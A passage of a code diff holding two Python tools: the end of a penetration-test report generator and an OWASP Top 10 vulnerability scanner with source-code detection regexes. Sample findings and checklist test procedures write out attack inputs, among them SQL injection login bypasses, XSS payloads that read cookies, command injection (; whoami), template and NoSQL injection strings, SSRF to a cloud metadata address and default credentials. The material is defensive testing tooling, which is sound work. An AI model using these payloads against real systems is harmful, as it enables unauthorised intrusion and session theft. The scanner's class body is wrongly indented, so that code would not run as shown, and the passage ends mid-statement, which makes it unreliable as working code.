                         "allow attackers to compromise the system with minimal effort.")
        elif high > 0:
            lines.append("> **HIGH RISK**: Prompt remediation recommended. High-severity vulnerabilities "
                         "pose significant risk of exploitation.")
        elif medium > 0:
            lines.append("> **MODERATE RISK**: Remediation should be planned within the next sprint. "
                         "Medium findings may be chained for greater impact.")
        else:
            lines.append("> **LOW RISK**: The application has a reasonable security posture. "
                         "Address low-severity findings during regular maintenance.")
        return "\n".join(lines)

    def _scope_section(self) -> str:
        """Build the scope section from metadata, with sensible defaults."""
        scope = self.metadata.get("scope", "Full application security assessment")
        exclusions = self.metadata.get("exclusions", "None specified")
        test_type = self.metadata.get("test_type", "Gray box")
        lines = [
            "## Scope",
            "",
            f"- **In Scope**: {scope}",
            f"- **Exclusions**: {exclusions}",
            f"- **Test Type**: {test_type}",
        ]
        return "\n".join(lines)

    def _findings_table(self) -> str:
        """Build the severity-sorted findings overview table."""
        lines = [
            "## Findings Overview",
            "",
            "| # | Severity | CVSS | Title | Category |",
            "|---|----------|------|-------|----------|",
        ]
        for i, f in enumerate(self.findings, 1):
            sev_badge = f.severity.upper()
            lines.append(f"| {i} | {sev_badge} | {f.cvss_score} | {f.title} | {f.category} |")
        return "\n".join(lines)

    def _detailed_findings(self) -> str:
        """Build one detailed subsection per finding, with evidence in a code fence."""
        lines = ["## Detailed Findings"]
        for i, f in enumerate(self.findings, 1):
            lines.append("")
            lines.append(f"### {i}. {f.title}")
            lines.append("")
            # CVSS vector is optional; only shown when present.
            lines.append(f"**Severity:** {f.severity.upper()} | **CVSS:** {f.cvss_score}"
                         + (f" | **Vector:** `{f.cvss_vector}`" if f.cvss_vector else ""))
            lines.append(f"**Category:** {f.category}")
            lines.append("")
            lines.append("#### Description")
            lines.append("")
            lines.append(f"{f.description}")
            lines.append("")
            lines.append("#### Evidence")
            lines.append("")
            lines.append("```")
            lines.append(f"{f.evidence}")
            lines.append("```")
            lines.append("")
            lines.append("#### Impact")
            lines.append("")
            lines.append(f"{f.impact}")
            lines.append("")
            lines.append("#### Remediation")
            lines.append("")
            lines.append(f"{f.remediation}")
            if f.references:
                lines.append("")
                lines.append("#### References")
                lines.append("")
                for ref in f.references:
                    lines.append(f"- {ref}")
        return "\n".join(lines)

    def _remediation_matrix(self) -> str:
        """Build the effort-vs-severity remediation priority table."""
        lines = [
            "## Remediation Priority Matrix",
            "",
            "Prioritize remediation based on severity and effort:",
            "",
            "| # | Finding | Severity | Effort | Priority |",
            "|---|---------|----------|--------|----------|",
        ]
        for i, f in enumerate(self.findings, 1):
            priority = self._compute_priority(f)
            lines.append(f"| {i} | {f.title} | {f.severity.upper()} | {f.effort} | {priority} |")
        lines.append("")
        lines.append("**Priority Key:** P1 = Fix immediately, P2 = Fix this sprint, "
                     "P3 = Fix this quarter, P4 = Backlog")
        return "\n".join(lines)

    def _methodology_section(self) -> str:
        """Build the static methodology section (OWASP Testing Guide / PTES)."""
        lines = [
            "## Methodology",
            "",
            "Testing followed the OWASP Testing Guide v4.2 and PTES (Penetration Testing Execution Standard):",
            "",
            "1. **Reconnaissance** — Mapped attack surface, identified endpoints and technologies",
            "2. **Vulnerability Discovery** — Automated scanning + manual testing for OWASP Top 10",
            "3. **Exploitation** — Validated findings with proof-of-concept (non-destructive)",
            "4. **Post-Exploitation** — Assessed lateral movement and data access potential",
            "5. **Reporting** — Documented findings with evidence and remediation guidance",
        ]
        return "\n".join(lines)

    def _appendix(self) -> str:
        """Build the appendix: CVSS reference table, disclaimer, and footer."""
        lines = [
            "## Appendix",
            "",
            "### CVSS Scoring Reference",
            "",
            "| Score Range | Severity |",
            "|-------------|----------|",
            "| 9.0 - 10.0 | Critical |",
            "| 7.0 - 8.9 | High |",
            "| 4.0 - 6.9 | Medium |",
            "| 0.1 - 3.9 | Low |",
            "| 0.0 | Informational |",
            "",
            "### Disclaimer",
            "",
            "This report represents a point-in-time assessment. New vulnerabilities may emerge after "
            "the testing period. Regular security assessments are recommended.",
            "",
            f"---\n\n*Report generated on {self.generated_at}*",
        ]
        return "\n".join(lines)

    def _calculate_risk_score(self) -> float:
        """Calculate overall risk score (0-10) based on findings."""
        if not self.findings:
            return 0.0
        # Weighted by severity
        weights = {"critical": 10, "high": 7, "medium": 4, "low": 1.5, "info": 0.5}
        total_weight = sum(weights.get(f.severity, 0) for f in self.findings)
        # Normalize: cap at 10, scale based on number of findings
        score = min(10.0, total_weight / max(len(self.findings) * 0.5, 1))
        return round(score, 1)

    def _risk_level(self) -> str:
        """Return risk level string based on score."""
        # Thresholds mirror the CVSS reference table in the appendix.
        score = self._calculate_risk_score()
        if score >= 9.0:
            return "CRITICAL"
        elif score >= 7.0:
            return "HIGH"
        elif score >= 4.0:
            return "MEDIUM"
        elif score > 0:
            return "LOW"
        return "NONE"

    def _compute_priority(self, finding: Finding) -> str:
        """Compute remediation priority from severity and effort."""
        # Low-effort fixes get a multiplier boost so quick wins rank higher.
        sev = SEVERITY_ORDER.get(finding.severity, 0)
        effort_map = {"low": 3, "medium": 2, "high": 1}
        effort_val = effort_map.get(finding.effort, 2)
        score = sev * effort_val
        if score >= 12:
            return "P1"
        elif score >= 8:
            return "P2"
        elif score >= 4:
            return "P3"
        return "P4"

    def _remediation_priority_list(self) -> List[Dict]:
        """Return ordered list of remediation priorities for JSON output."""
        result = []
        for f in self.findings:
            result.append({
                "title": f.title,
                "severity": f.severity,
                "effort": f.effort,
                "priority": self._compute_priority(f),
                "remediation": f.remediation,
            })
        return result
def load_findings(path: str) -> tuple:
    """Load findings (and optional metadata) from a JSON file.

    Accepts either a bare JSON array of finding objects, or an object of
    the form {"metadata": {...}, "findings": [...]}. Missing fields fall
    back to neutral defaults. Exits with status 1 on unreadable files or
    invalid JSON. Returns (findings, metadata).
    """
    try:
        raw = json.loads(Path(path).read_text(encoding="utf-8"))
    except (OSError, json.JSONDecodeError) as e:
        print(f"Error loading findings: {e}", file=sys.stderr)
        sys.exit(1)
    # Support both list-of-findings and object-with-metadata formats.
    if isinstance(raw, dict):
        metadata = raw.get("metadata", {})
        entries = raw.get("findings", [])
    else:
        metadata = {}
        entries = raw
    findings = [
        Finding(
            title=entry.get("title", "Untitled Finding"),
            severity=entry.get("severity", "medium"),
            cvss_score=float(entry.get("cvss_score", 0.0)),
            category=entry.get("category", "Uncategorized"),
            description=entry.get("description", ""),
            evidence=entry.get("evidence", "No evidence provided"),
            impact=entry.get("impact", ""),
            remediation=entry.get("remediation", ""),
            cvss_vector=entry.get("cvss_vector", ""),
            references=entry.get("references", []),
            effort=entry.get("effort", "medium"),
        )
        for entry in entries
    ]
    return findings, metadata
def generate_sample_findings() -> str:
    """Return a two-finding sample JSON document illustrating the input schema."""
    sqli = {
        "title": "SQL Injection in Login Endpoint",
        "severity": "critical",
        "cvss_score": 9.8,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "category": "A03:2021 - Injection",
        "description": "The /api/login endpoint is vulnerable to SQL injection via the email parameter.",
        "evidence": "Request: POST /api/login {\"email\": \"' OR 1=1--\", \"password\": \"x\"}\nResponse: 200 OK with admin session token",
        "impact": "Full database access, authentication bypass, potential remote code execution.",
        "remediation": "Use parameterized queries. Replace string concatenation with prepared statements.",
        "references": ["https://cwe.mitre.org/data/definitions/89.html"],
        "effort": "low",
    }
    xss = {
        "title": "Stored XSS in User Profile",
        "severity": "high",
        "cvss_score": 7.1,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "category": "A03:2021 - Injection",
        "description": "The user profile 'bio' field does not sanitize HTML input.",
        "evidence": "Submitted <img src=x onerror=alert(document.cookie)> in bio field.\nVisiting the profile page executes the payload.",
        "impact": "Session hijacking, account takeover, phishing via stored malicious content.",
        "remediation": "Sanitize all user input with DOMPurify. Implement Content-Security-Policy.",
        "references": ["https://cwe.mitre.org/data/definitions/79.html"],
        "effort": "low",
    }
    return json.dumps([sqli, xss], indent=2)
def main():
    """CLI entry point: load findings and emit a markdown or JSON report."""
    parser = argparse.ArgumentParser(
        description="Pen Test Report Generator — Generate professional penetration testing reports from structured findings.",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
%(prog)s --findings findings.json --format md --output report.md
%(prog)s --findings findings.json --format json
%(prog)s --sample > sample_findings.json
Findings JSON format:
A JSON array of objects with: title, severity, cvss_score, category,
description, evidence, impact, remediation, cvss_vector, references, effort.
Use --sample to generate a template.
""",
    )
    parser.add_argument("--findings", metavar="FILE",
                        help="Path to findings JSON file")
    parser.add_argument("--format", choices=["md", "json"], default="md",
                        help="Output format (default: md)")
    parser.add_argument("--output", metavar="FILE",
                        help="Output file path (default: stdout)")
    parser.add_argument("--json", action="store_true", dest="json_shortcut",
                        help="Shortcut for --format json")
    parser.add_argument("--sample", action="store_true",
                        help="Print sample findings JSON and exit")
    args = parser.parse_args()

    # --sample short-circuits everything else.
    if args.sample:
        print(generate_sample_findings())
        return
    if not args.findings:
        parser.error("--findings is required (use --sample to generate a template)")
    if not Path(args.findings).exists():
        print(f"Error: File not found: {args.findings}", file=sys.stderr)
        sys.exit(1)

    output_format = "json" if args.json_shortcut else args.format
    findings, metadata = load_findings(args.findings)
    if not findings:
        print("No findings loaded. Check the JSON file format.", file=sys.stderr)
        sys.exit(1)

    generator = PentestReportGenerator(findings=findings, metadata=metadata)
    report = (json.dumps(generator.generate_json(), indent=2)
              if output_format == "json"
              else generator.generate_markdown())

    if args.output:
        Path(args.output).write_text(report, encoding="utf-8")
        print(f"Report written to {args.output}")
    else:
        print(report)


if __name__ == "__main__":
    main()

View File

@@ -0,0 +1,545 @@
#!/usr/bin/env python3
"""
Vulnerability Scanner - Generate OWASP Top 10 security checklists and scan for common patterns.
Table of Contents:
VulnerabilityScanner - Main class for vulnerability scanning
__init__ - Initialize with target type and scope
generate_checklist - Generate OWASP Top 10 checklist for target
scan_source - Scan source directory for vulnerability patterns
_scan_file - Scan individual file for regex patterns
_get_owasp_checks - Return OWASP checks for target type
main() - CLI entry point
Usage:
python vulnerability_scanner.py --target web --scope full
python vulnerability_scanner.py --target api --scope quick --json
python vulnerability_scanner.py --target web --source /path/to/code --scope full
"""
import argparse
import json
import os
import re
import sys
from dataclasses import dataclass, asdict, field
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional
@dataclass
class CheckItem:
    """A single check item in the OWASP checklist."""
    owasp_id: str            # OWASP Top 10 id, e.g. "A01"
    owasp_category: str      # category name, e.g. "Broken Access Control"
    check_id: str            # unique check id, e.g. "A01-01"
    title: str               # short check name
    description: str         # what the check verifies
    test_procedure: str      # how a tester performs the check
    severity: str  # critical, high, medium, low, info
    applicable_targets: List[str] = field(default_factory=list)  # e.g. ["web", "api", "all"]
    status: str = "pending"  # pending, pass, fail, na
@dataclass
class SourceFinding:
    """A vulnerability pattern found in source code."""
    rule_id: str             # scanner rule id, e.g. "SQLI-001"
    title: str               # short rule name
    severity: str            # critical, high, medium, low, info
    owasp_category: str      # e.g. "A03:2021 - Injection"
    file_path: str           # path of the file that matched
    line_number: int         # 1-based line where the pattern matched
    code_snippet: str        # matching line, stripped and truncated
    recommendation: str      # how to remediate the match
class VulnerabilityScanner:
"""Generate OWASP Top 10 checklists and scan source code for vulnerability patterns."""
# File extensions considered source code and worth scanning.
SCAN_EXTENSIONS = {
    ".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go",
    ".rb", ".php", ".cs", ".rs", ".html", ".vue", ".svelte",
}
# Directory names pruned from the walk (vendored deps, build output, VCS).
SKIP_DIRS = {
    "node_modules", ".git", "__pycache__", ".venv", "venv",
    "vendor", "dist", "build", ".next", "target",
}
def __init__(self, target: str = "web", scope: str = "full", source: Optional[str] = None):
    """Store the scan configuration.

    target: target type used to filter checklist items (e.g. "web", "api").
    scope: "full" or "quick" (quick drops low/info checks).
    source: optional source directory path for pattern scanning.
    """
    self.target, self.scope, self.source = target, scope, source
def generate_checklist(self) -> List[CheckItem]:
    """Generate the OWASP Top 10 checklist filtered by target and scope.

    A check is kept when it applies to this target (or to "all"); in
    "quick" scope, low/info checks are additionally dropped.
    """
    def applies(check: CheckItem) -> bool:
        target_ok = (self.target in check.applicable_targets
                     or "all" in check.applicable_targets)
        depth_ok = not (self.scope == "quick" and check.severity in ("low", "info"))
        return target_ok and depth_ok

    return [check for check in self._get_owasp_checks() if applies(check)]
def scan_source(self, path: str) -> List[SourceFinding]:
    """Walk a source tree and scan every recognized source file.

    Directories in SKIP_DIRS are pruned in place; only files whose suffix
    is in SCAN_EXTENSIONS are scanned. A missing path yields no findings.
    """
    results: List[SourceFinding] = []
    root_dir = Path(path)
    if not root_dir.exists():
        return results
    for current, subdirs, filenames in os.walk(root_dir):
        # Mutating subdirs in place prunes the walk below skipped dirs.
        subdirs[:] = [d for d in subdirs if d not in self.SKIP_DIRS]
        for filename in filenames:
            candidate = Path(current) / filename
            if candidate.suffix in self.SCAN_EXTENSIONS:
                results.extend(self._scan_file(candidate))
    return results
def _scan_file(self, file_path: Path) -> List[SourceFinding]:
    """Scan a single file, line by line, for vulnerability regex patterns.

    Returns one SourceFinding per (line, rule) match. Unreadable files are
    skipped silently. NOTE: matching is per physical line, so calls split
    across multiple lines are not detected.
    """
    findings = []
    try:
        content = file_path.read_text(encoding="utf-8", errors="ignore")
    except (OSError, PermissionError):
        return findings
    patterns = [
        {
            "rule_id": "SQLI-001",
            "title": "Potential SQL Injection (string concatenation)",
            "severity": "critical",
            "owasp_category": "A03:2021 - Injection",
            "pattern": r'''(?:execute|query|cursor\.execute)\s*\(\s*(?:f["\']|["\'].*%s|["\'].*\+\s*\w+|["\'].*\.format)''',
            "recommendation": "Use parameterized queries or prepared statements instead of string concatenation.",
            "extensions": {".py", ".js", ".ts", ".java", ".rb", ".php"},
        },
        {
            "rule_id": "SQLI-002",
            "title": "Potential SQL Injection (template literal)",
            "severity": "critical",
            "owasp_category": "A03:2021 - Injection",
            "pattern": r'''(?:query|execute|raw)\s*\(\s*`[^`]*\$\{''',
            "recommendation": "Use parameterized queries. Never interpolate user input into SQL strings.",
            "extensions": {".js", ".ts", ".jsx", ".tsx"},
        },
        {
            "rule_id": "XSS-001",
            "title": "Potential DOM-based XSS (innerHTML)",
            "severity": "high",
            "owasp_category": "A03:2021 - Injection",
            "pattern": r'''\.innerHTML\s*=\s*(?!['"][^'"]*['"])''',
            "recommendation": "Use textContent or a sanitization library (DOMPurify) instead of innerHTML.",
            "extensions": {".js", ".ts", ".jsx", ".tsx", ".html", ".vue", ".svelte"},
        },
        {
            "rule_id": "XSS-002",
            "title": "React dangerouslySetInnerHTML usage",
            "severity": "high",
            "owasp_category": "A03:2021 - Injection",
            "pattern": r'''dangerouslySetInnerHTML''',
            "recommendation": "Sanitize HTML with DOMPurify before using dangerouslySetInnerHTML.",
            "extensions": {".jsx", ".tsx", ".js", ".ts"},
        },
        {
            "rule_id": "CMDI-001",
            "title": "Potential Command Injection (shell=True)",
            "severity": "critical",
            "owasp_category": "A03:2021 - Injection",
            "pattern": r'''subprocess\.\w+\(.*shell\s*=\s*True''',
            "recommendation": "Avoid shell=True. Use subprocess with a list of arguments instead.",
            "extensions": {".py"},
        },
        {
            "rule_id": "CMDI-002",
            "title": "Potential Command Injection (eval/exec)",
            "severity": "critical",
            "owasp_category": "A03:2021 - Injection",
            "pattern": r'''(?:^|\s)(?:eval|exec)\s*\((?!.*(?:#\s*nosec|NOSONAR))''',
            "recommendation": "Never use eval() or exec() with untrusted input. Use ast.literal_eval() for data parsing.",
            "extensions": {".py", ".js", ".ts"},
        },
        {
            "rule_id": "SEC-001",
            "title": "Hardcoded Secret or API Key",
            "severity": "critical",
            "owasp_category": "A02:2021 - Cryptographic Failures",
            "pattern": r'''(?i)(?:api[_-]?key|secret[_-]?key|password|passwd|token)\s*[:=]\s*['\"][a-zA-Z0-9+/=]{16,}['\"]''',
            "recommendation": "Move secrets to environment variables or a secrets manager (Vault, AWS Secrets Manager).",
            "extensions": {".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go", ".rb", ".php"},
        },
        {
            "rule_id": "SEC-002",
            "title": "AWS Access Key ID detected",
            "severity": "critical",
            "owasp_category": "A02:2021 - Cryptographic Failures",
            "pattern": r'''AKIA[0-9A-Z]{16}''',
            "recommendation": "Remove the AWS key immediately. Rotate the credential and use IAM roles or environment variables.",
            "extensions": None,  # scan all files
        },
        {
            "rule_id": "CRYPTO-001",
            "title": "Weak hashing algorithm (MD5/SHA1)",
            "severity": "high",
            "owasp_category": "A02:2021 - Cryptographic Failures",
            "pattern": r'''(?:md5|sha1)\s*\(''',
            "recommendation": "Use bcrypt, scrypt, or argon2 for passwords. Use SHA-256+ for integrity checks.",
            "extensions": {".py", ".js", ".ts", ".java", ".go", ".rb", ".php"},
        },
        {
            "rule_id": "SSRF-001",
            "title": "Potential SSRF (user-controlled URL in HTTP request)",
            "severity": "high",
            "owasp_category": "A10:2021 - SSRF",
            "pattern": r'''(?:requests\.get|fetch|axios|http\.get|urllib\.request\.urlopen)\s*\(\s*(?:request\.|req\.|params|args|input|user)''',
            "recommendation": "Validate and allowlist URLs before making outbound requests. Block internal IPs.",
            "extensions": {".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go"},
        },
        {
            "rule_id": "PATH-001",
            "title": "Potential Path Traversal",
            "severity": "high",
            "owasp_category": "A01:2021 - Broken Access Control",
            "pattern": r'''(?:open|readFile|readFileSync|Path\.join)\s*\(.*(?:request\.|req\.|params|args|input|user)''',
            "recommendation": "Sanitize file paths. Use os.path.basename() and validate against an allowlist.",
            "extensions": {".py", ".js", ".ts", ".java", ".go"},
        },
        {
            "rule_id": "DESER-001",
            "title": "Unsafe Deserialization (pickle/yaml.load)",
            "severity": "critical",
            "owasp_category": "A08:2021 - Software and Data Integrity Failures",
            # Bug fix: the SafeLoader lookahead was placed AFTER the closing
            # paren, so safe calls like yaml.load(f, Loader=yaml.SafeLoader)
            # were still flagged. The lookahead now inspects the call's
            # arguments instead.
            "pattern": r'''(?:pickle\.load|yaml\.load\s*\((?![^)]*Loader\s*=\s*yaml\.SafeLoader))''',
            "recommendation": "Use yaml.safe_load() instead of yaml.load(). Avoid pickle for untrusted data.",
            "extensions": {".py"},
        },
        {
            "rule_id": "AUTH-001",
            "title": "JWT with hardcoded secret",
            "severity": "critical",
            "owasp_category": "A07:2021 - Identification and Authentication Failures",
            "pattern": r'''jwt\.(?:encode|sign)\s*\([^)]*['\"][a-zA-Z0-9]{8,}['\"]''',
            "recommendation": "Load JWT secrets from environment variables. Use RS256 with key pairs for production.",
            "extensions": {".py", ".js", ".ts"},
        },
    ]
    # Perf: filter rules by file extension once per file, not once per line.
    # "extensions": None means the rule applies to every file type.
    applicable = [pat for pat in patterns
                  if pat["extensions"] is None or file_path.suffix in pat["extensions"]]
    for i, line in enumerate(content.split("\n"), 1):
        for pat in applicable:
            if re.search(pat["pattern"], line):
                findings.append(SourceFinding(
                    rule_id=pat["rule_id"],
                    title=pat["title"],
                    severity=pat["severity"],
                    owasp_category=pat["owasp_category"],
                    file_path=str(file_path),
                    line_number=i,
                    code_snippet=line.strip()[:200],  # cap snippet length
                    recommendation=pat["recommendation"],
                ))
    return findings
def _get_owasp_checks(self) -> List[CheckItem]:
    """Build the comprehensive OWASP Top 10 checklist.

    Each row below is a tuple of
    (owasp_id, owasp_category, check_id, title, description,
     test_procedure, severity, applies_to)
    and is expanded positionally into a CheckItem, which keeps the
    table compact and makes adding new checks a one-row change.
    """
    rows = [
        # A01: Broken Access Control
        ("A01", "Broken Access Control", "A01-01",
         "Horizontal Privilege Escalation",
         "Verify users cannot access other users' resources by changing IDs.",
         "Change resource IDs in API requests (e.g., /users/123 → /users/124). Expect 403.",
         "critical", ["web", "api", "all"]),
        ("A01", "Broken Access Control", "A01-02",
         "Vertical Privilege Escalation",
         "Verify regular users cannot access admin endpoints.",
         "Authenticate as regular user, request admin endpoints. Expect 403.",
         "critical", ["web", "api", "all"]),
        ("A01", "Broken Access Control", "A01-03",
         "CORS Misconfiguration",
         "Verify CORS policy does not allow arbitrary origins.",
         "Send request with Origin: https://evil.com. Check Access-Control-Allow-Origin.",
         "high", ["web", "api"]),
        ("A01", "Broken Access Control", "A01-04",
         "Forced Browsing",
         "Check for unprotected admin or debug pages.",
         "Request /admin, /debug, /api/admin, /.env, /swagger. Expect 403 or 404.",
         "high", ["web", "all"]),
        ("A01", "Broken Access Control", "A01-05",
         "Directory Listing",
         "Verify directory listing is disabled on the web server.",
         "Request directory paths without index file. Should not list contents.",
         "medium", ["web"]),
        # A02: Cryptographic Failures
        ("A02", "Cryptographic Failures", "A02-01",
         "TLS Version Check",
         "Ensure TLS 1.2+ is enforced. Reject TLS 1.0/1.1.",
         "Run: nmap --script ssl-enum-ciphers -p 443 target.com",
         "high", ["web", "api", "all"]),
        ("A02", "Cryptographic Failures", "A02-02",
         "Password Hashing Algorithm",
         "Verify passwords use bcrypt/scrypt/argon2 with adequate cost.",
         "Review authentication code for hashing implementation.",
         "critical", ["web", "api", "all"]),
        ("A02", "Cryptographic Failures", "A02-03",
         "Sensitive Data in URLs",
         "Check for tokens, passwords, or PII in query parameters.",
         "Review access logs and URL patterns for sensitive query params.",
         "high", ["web", "api"]),
        ("A02", "Cryptographic Failures", "A02-04",
         "HSTS Header",
         "Verify Strict-Transport-Security header is present.",
         "Check response headers for HSTS with max-age >= 31536000.",
         "medium", ["web"]),
        # A03: Injection
        ("A03", "Injection", "A03-01",
         "SQL Injection",
         "Test input fields for SQL injection vulnerabilities.",
         "Submit ' OR 1=1-- in input fields. Check for errors or unexpected behavior.",
         "critical", ["web", "api", "all"]),
        ("A03", "Injection", "A03-02",
         "XSS (Cross-Site Scripting)",
         "Test for reflected, stored, and DOM-based XSS.",
         "Submit <script>alert(1)</script> in input fields. Check if rendered.",
         "high", ["web", "all"]),
        ("A03", "Injection", "A03-03",
         "Command Injection",
         "Test for OS command injection in input fields.",
         "Submit ; whoami in fields that may trigger system commands.",
         "critical", ["web", "api"]),
        ("A03", "Injection", "A03-04",
         "Template Injection",
         "Test for server-side template injection.",
         "Submit {{7*7}} and ${7*7} in input fields. Check for 49 in response.",
         "high", ["web", "api"]),
        ("A03", "Injection", "A03-05",
         "NoSQL Injection",
         "Test for NoSQL injection in JSON inputs.",
         "Submit {\"$gt\": \"\"} in JSON fields. Check for data leakage.",
         "high", ["api"]),
        # A04: Insecure Design
        ("A04", "Insecure Design", "A04-01",
         "Rate Limiting on Authentication",
         "Verify rate limiting exists on login and password reset endpoints.",
         "Send 50+ rapid login requests. Expect 429 after threshold.",
         "high", ["web", "api", "all"]),
        ("A04", "Insecure Design", "A04-02",
         "Business Logic Abuse",
         "Test for business logic flaws (negative quantities, state manipulation).",
         "Try negative values, skip steps in workflows, manipulate client-side calculations.",
         "high", ["web", "api"]),
        ("A04", "Insecure Design", "A04-03",
         "Account Lockout",
         "Verify account lockout after repeated failed login attempts.",
         "Submit 10+ failed login attempts. Check for lockout or CAPTCHA.",
         "medium", ["web", "api"]),
        # A05: Security Misconfiguration
        ("A05", "Security Misconfiguration", "A05-01",
         "Default Credentials",
         "Check for default credentials on admin panels and services.",
         "Try admin:admin, root:root, admin:password on all login forms.",
         "critical", ["web", "api", "all"]),
        ("A05", "Security Misconfiguration", "A05-02",
         "Debug Mode in Production",
         "Verify debug mode is disabled in production.",
         "Trigger errors and check for stack traces, debug info, or verbose errors.",
         "high", ["web", "api", "all"]),
        ("A05", "Security Misconfiguration", "A05-03",
         "Security Headers",
         "Verify all security headers are present and properly configured.",
         "Check for CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy.",
         "medium", ["web"]),
        ("A05", "Security Misconfiguration", "A05-04",
         "Unnecessary HTTP Methods",
         "Verify only required HTTP methods are enabled.",
         "Send OPTIONS request. Check for TRACE, DELETE on public endpoints.",
         "low", ["web", "api"]),
        # A06: Vulnerable Components
        ("A06", "Vulnerable and Outdated Components", "A06-01",
         "Dependency CVE Audit",
         "Scan all dependencies for known CVEs.",
         "Run npm audit, pip audit, govulncheck, or bundle audit.",
         "high", ["web", "api", "mobile", "all"]),
        ("A06", "Vulnerable and Outdated Components", "A06-02",
         "End-of-Life Framework Check",
         "Verify no EOL frameworks or languages are in use.",
         "Check framework versions against vendor EOL dates.",
         "medium", ["web", "api", "all"]),
        # A07: Authentication Failures
        ("A07", "Identification and Authentication Failures", "A07-01",
         "Brute Force Protection",
         "Verify brute force protection on authentication endpoints.",
         "Send 100 rapid login attempts. Expect blocking after threshold.",
         "high", ["web", "api", "all"]),
        ("A07", "Identification and Authentication Failures", "A07-02",
         "Session Management",
         "Verify sessions are properly managed (HttpOnly, Secure, SameSite).",
         "Check cookie flags: HttpOnly, Secure, SameSite=Strict|Lax.",
         "high", ["web"]),
        ("A07", "Identification and Authentication Failures", "A07-03",
         "Session Invalidation on Logout",
         "Verify sessions are invalidated on logout.",
         "Logout, then replay the session cookie. Should receive 401.",
         "high", ["web", "api"]),
        ("A07", "Identification and Authentication Failures", "A07-04",
         "Username Enumeration",
         "Check for username enumeration via error messages.",
         "Submit valid and invalid usernames. Error messages should be identical.",
         "medium", ["web", "api"]),
        # A08: Data Integrity
        ("A08", "Software and Data Integrity Failures", "A08-01",
         "Unsafe Deserialization",
         "Check for unsafe deserialization of user input.",
         "Review code for pickle.load(), yaml.load(), Java ObjectInputStream.",
         "critical", ["web", "api"]),
        ("A08", "Software and Data Integrity Failures", "A08-02",
         "Subresource Integrity",
         "Verify SRI hashes on CDN-loaded scripts and stylesheets.",
         "Check <script> and <link> tags for integrity attributes.",
         "medium", ["web"]),
        # A09: Logging Failures
        ("A09", "Security Logging and Monitoring Failures", "A09-01",
         "Authentication Event Logging",
         "Verify login success and failure events are logged.",
         "Attempt valid and invalid logins. Check server logs for entries.",
         "medium", ["web", "api", "all"]),
        ("A09", "Security Logging and Monitoring Failures", "A09-02",
         "Sensitive Data in Logs",
         "Verify passwords, tokens, and PII are not logged.",
         "Review log configuration and sample log output for sensitive data.",
         "high", ["web", "api", "all"]),
        # A10: SSRF
        ("A10", "Server-Side Request Forgery", "A10-01",
         "Internal Network Access via SSRF",
         "Test URL input fields for SSRF vulnerabilities.",
         "Submit http://169.254.169.254/ and http://127.0.0.1 in URL fields.",
         "critical", ["web", "api"]),
        ("A10", "Server-Side Request Forgery", "A10-02",
         "DNS Rebinding",
         "Test for DNS rebinding attacks on URL validators.",
         "Use a DNS rebinding service to bypass allowlist validation.",
         "high", ["web", "api"]),
    ]
    return [CheckItem(*row) for row in rows]
def format_checklist_text(checks: List[CheckItem]) -> str:
    """Render the OWASP checklist as a plain-text report grouped by category.

    A section divider is emitted the first time each OWASP category
    appears; every check is prefixed with a severity marker.
    """
    # Severity → visual marker shown before each check line.
    markers = {"critical": "[!!!]", "high": "[!! ]", "medium": "[! ]", "low": "[. ]", "info": "[ ]"}
    header = [
        "=" * 70,
        "OWASP TOP 10 SECURITY CHECKLIST",
        f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}",
        f"Total checks: {len(checks)}",
        "=" * 70,
    ]
    body = []
    last_category = ""
    for item in checks:
        if item.owasp_category != last_category:
            last_category = item.owasp_category
            body.append(f"\n--- {item.owasp_id}: {item.owasp_category} ---\n")
        body.append(f" {markers.get(item.severity, '[ ]')} [{item.check_id}] {item.title}")
        body.append(f" {item.description}")
        body.append(f" Test: {item.test_procedure}")
        body.append(f" Severity: {item.severity.upper()}")
        body.append("")
    return "\n".join(header + body)
def format_findings_text(findings: List[SourceFinding]) -> str:
    """Render source-scan findings as plain text, grouped by severity.

    Groups are printed worst-first (critical → info); an empty findings
    list yields a single "nothing detected" message.
    """
    if not findings:
        return "No vulnerability patterns detected in source code."
    severity_order = ["critical", "high", "medium", "low", "info"]
    buckets = {sev: [] for sev in severity_order}
    for finding in findings:
        # Unknown severities fold into the "info" bucket rather than erroring.
        buckets.get(finding.severity, buckets["info"]).append(finding)
    out = [f"\nSOURCE CODE FINDINGS: {len(findings)} issue(s) found\n"]
    for sev in severity_order:
        group = buckets[sev]
        if not group:
            continue
        out.append(f" [{sev.upper()}] ({len(group)} finding(s))")
        for finding in group:
            out.append(f" - {finding.title} [{finding.rule_id}]")
            out.append(f" File: {finding.file_path}:{finding.line_number}")
            out.append(f" Code: {finding.code_snippet}")
            out.append(f" Fix: {finding.recommendation}")
            out.append("")
    return "\n".join(out)
def _build_arg_parser() -> argparse.ArgumentParser:
    """Construct the CLI argument parser for the vulnerability scanner."""
    parser = argparse.ArgumentParser(
        description="Vulnerability Scanner — Generate OWASP Top 10 checklists and scan source code for vulnerability patterns.",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  %(prog)s --target web --scope full
  %(prog)s --target api --scope quick --json
  %(prog)s --target web --source /path/to/code --scope full
  %(prog)s --target mobile --scope quick --json
""",
    )
    parser.add_argument("--target", choices=["web", "api", "mobile"], default="web",
                        help="Target application type (default: web)")
    parser.add_argument("--scope", choices=["quick", "full"], default="full",
                        help="Scan scope: quick (high/critical only) or full (default: full)")
    parser.add_argument("--source", metavar="PATH",
                        help="Optional: path to source code directory to scan for patterns")
    parser.add_argument("--json", action="store_true", dest="json_output",
                        help="Output results as JSON")
    return parser


def main():
    """CLI entry point: build the checklist, optionally scan source, emit results.

    Prints JSON when --json is given, otherwise a text report. Exits with
    status 1 when the source scan surfaced critical or high findings so CI
    pipelines can fail the build.
    """
    args = _build_arg_parser().parse_args()
    scanner = VulnerabilityScanner(target=args.target, scope=args.scope)
    checklist = scanner.generate_checklist()
    source_findings = scanner.scan_source(args.source) if args.source else []
    if args.json_output:
        payload = {
            "scan_metadata": {
